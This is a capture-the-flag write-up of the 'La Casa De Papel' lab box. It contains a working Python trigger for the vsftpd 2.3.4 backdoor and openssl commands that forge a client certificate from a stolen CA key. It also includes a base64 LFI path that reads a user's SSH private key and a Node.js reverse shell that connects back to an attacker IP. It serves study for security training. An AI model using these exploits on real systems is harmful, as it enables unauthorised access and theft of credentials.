Nmap scan report for 10.10.10.131
Host is up (0.17s latency).
Not shown: 65530 closed ports
PORT     STATE    SERVICE  VERSION
21/tcp   open     ftp      vsftpd 2.3.4
22/tcp   open     ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp   open     http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp  open     ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
6200/tcp filtered lm-x
Service Info: OS: Unix
After the nmap scan, it looked like this box was going to be pretty heavy on web application exploitation, which was something I knew I needed to get better at before my upcoming OSCP exam.
After poking around the webserver for a bit, there wasn't much I could find on the HTTP side, and even running dirsearch and gobuster against it with some extensive wordlists turned up nothing. The HTTPS side of the server wouldn't let me connect to enumerate further until I presented a valid certificate for 'client certificate authentication', which I didn't have yet. This left me at a bit of a dead end, so I went back to the nmap scan and noticed port 6200, which I had previously overlooked because it was filtered.
Some quick googling showed that 6200 is a port commonly associated with vsftpd, but every attempt to connect to it was rejected, so there had to be a way to get the port to open up. Checking searchsploit, I saw that this version of vsftpd (2.3.4) had a backdoor maliciously installed in it, and I was able to get the port to open by connecting to the FTP server and triggering it.
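The trigger itself is simple: the vsftpd 2.3.4 backdoor fires when the FTP username ends in ":)", after which the daemon listens for a raw shell on port 6200. A minimal sketch in Python (the username and password values are arbitrary placeholders):

```python
import socket

def backdoor_login(user="letmein"):
    # The vsftpd 2.3.4 backdoor triggers on any USER value ending in ":)"
    return ("USER %s:)\r\nPASS whatever\r\n" % user).encode()

def trigger(host, port=21, timeout=5):
    # Send the smiley login; the backdoored daemon then opens port 6200.
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                 # read the FTP banner
        s.sendall(backdoor_login())
        try:
            s.recv(1024)             # the FTP session often just hangs here
        except socket.timeout:
            pass

# trigger("10.10.10.131"), then connect with: nc 10.10.10.131 6200
```

After running this, a plain netcat connection to port 6200 reaches whatever the backdoor is serving (on this box, the Psy Shell described below).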
So now that port 6200 is open, we're greeted with something called 'Psy Shell', which didn't have any vulnerabilities I could find on an initial search. It did, however, let you write -some- valid forms of PHP into it and allowed for enumeration of files on the server. I say 'some' because the obvious reverse shells or system commands that I thought might give some form of code execution didn't work. Shown in the picture above, there was a variable listed that gave a bit of a hint as to how we could use this shell to get what we needed.
So now that we've got a private key for the CA, I can create a client certificate to get past the requirement on the HTTPS side of things. First, grab the public certificate from the server:
echo | \
openssl s_client -servername 10.10.10.131 -connect 10.10.10.131:443 2>/dev/null | \
openssl x509 -text
Now that I've got a private key and a public certificate, the last step is to generate a new user certificate from those two. This took a ridiculous amount of googling: I was familiar with the concept of public/private key generation, but this was my first time using the 'client certificate authentication' this box relies on. I mention that because, in hindsight, it's rather easy, but at the time I was thoroughly confused about how to get it working correctly. The commands are as follows:
openssl req -new -key cert.key -out req.csr
(cert.key is the private key grabbed from Psy Shell; this generates a certificate signing request that would normally be sent off to be signed with that private key)

openssl x509 -req -days 365 -in req.csr -signkey cert.key -out REQ.crt
(this creates the actual certificate that will be presented when the server requests client authentication)

openssl pkcs12 -export -in REQ.crt -inkey cert.key -out server.p12
(this is necessary for Firefox specifically; Chrome may accept the bare crt file, but Firefox only allowed the p12 format)
With a valid certificate 'signed' by the private key stolen off the server, it's now possible to get past the client certificate prompt when visiting the HTTPS side of the web server.
Still no foothold on the server with this, but at least it's now possible to browse the HTTPS site. After browsing through the files for a bit, I noticed the file names appeared to be base64 encoded, which led me to discover that there is actually an LFI vulnerability in the server. This sent me back to the Psy Shell I had access to earlier, where I noted down the valid users on the box and found a valid key that I could grab out of the browser.
../../../../../home/berlin/.ssh/id_rsa

Base64 encode this and you get what I put into the browser as the LFI path:

Li4vLi4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
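The encoding step above can be reproduced in a couple of lines of Python:

```python
import base64

# Traversal path to berlin's SSH private key, encoded the way the
# webserver expects its file names.
path = "../../../../../home/berlin/.ssh/id_rsa"
token = base64.b64encode(path.encode()).decode()
print(token)  # Li4vLi4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
```

Dropping that token into the file-name position of the URL makes the server read the traversal path instead of a legitimate file.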
Enumerating the users earlier turned out to be very useful: I had access to berlin's files via the webserver, but the key ended up being valid for the user 'professor'.
This part turned out to be very easy to exploit, but the permissions on the files led you to believe that you couldn't edit them even though it was possible to do so. This just goes to show you shouldn't always trust what you're presented with, as I spent a ridiculous amount of time on this part of the box because I'd dismissed the possibility that I 'couldn't' do what I wanted with the files.
Using a reverse shell via node here got me the permissions of the 'nobody' user.
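For reference, this is the general shape of a classic Node.js reverse shell: spawn /bin/sh and pipe its stdin/stdout/stderr over a TCP socket back to the attacker. Here it's built as a string in Python so it can be pasted into the writable file; the attacker address 10.10.14.2:4444 is a hypothetical placeholder, not the one used on the box.

```python
ATTACKER_IP, ATTACKER_PORT = "10.10.14.2", 4444   # hypothetical listener

# Classic Node.js reverse shell: pipe a /bin/sh child process over a socket.
node_payload = """
var net = require("net"), cp = require("child_process");
var sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(%d, "%s", function() {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
""" % (ATTACKER_PORT, ATTACKER_IP)

print(node_payload)
```

Catch the connection with `nc -lvnp 4444` on the attacking machine before the payload runs.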
Overall, a really fun box that introduced me to a new form of authentication and added another flavor of reverse shell using node. In hindsight, I can see why this box was rated easy, but there were numerous hiccups in my thought process that turned what should have been a couple of hours into a couple of days.